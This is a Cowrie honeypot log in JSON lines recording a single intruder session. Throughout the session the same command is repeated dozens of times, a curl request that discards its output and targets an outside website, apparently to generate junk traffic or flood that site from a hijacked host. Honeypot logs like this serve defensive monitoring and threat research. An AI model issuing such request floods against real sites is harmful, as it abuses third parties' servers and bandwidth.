{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.107158Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.229864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.231142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.270852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.272243Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.319399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.320520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.357418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.358886Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.396314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.397583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.436337Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.437498Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.476747Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.477843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.518792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.520228Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.557329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.558517Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.595359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.596543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.647028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.648442Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.687418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.688610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.735814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.736819Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.774187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.775628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.816773Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.817909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:07.913683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:07.914895Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.121216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.122949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.161222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.162494Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.203743Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.204950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.241867Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.243309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.292679Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.293785Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.330846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.331932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.379536Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.380684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.417888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.419176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.456414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.457696Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.494816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.495999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.533669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.534856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.571489Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.572663Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.609905Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.611184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.648005Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.649157Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.685997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.687208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.724670Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.726066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.774862Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.776280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.816072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.817457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.854917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.856199Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.892812Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.893801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.932271Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.933945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:08.971218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:08.972317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.011186Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.012394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.050382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.052404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.090749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.091790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.137758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.138818Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.198235Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.199628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.237602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.238819Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.287692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.289024Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.326826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.328325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.365825Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.366889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.403298Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.404515Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.441611Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.442958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.480229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.481301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.518804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.519853Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.557177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.558417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.605001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.606113Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.642491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.643514Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.679957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.680896Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.717841Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.718945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.757755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.758923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.801107Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.802304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.869821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.871092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.918497Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.919688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:09.960583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:09.961730Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.002363Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.003914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.086849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.088416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.130009Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.131250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.169007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
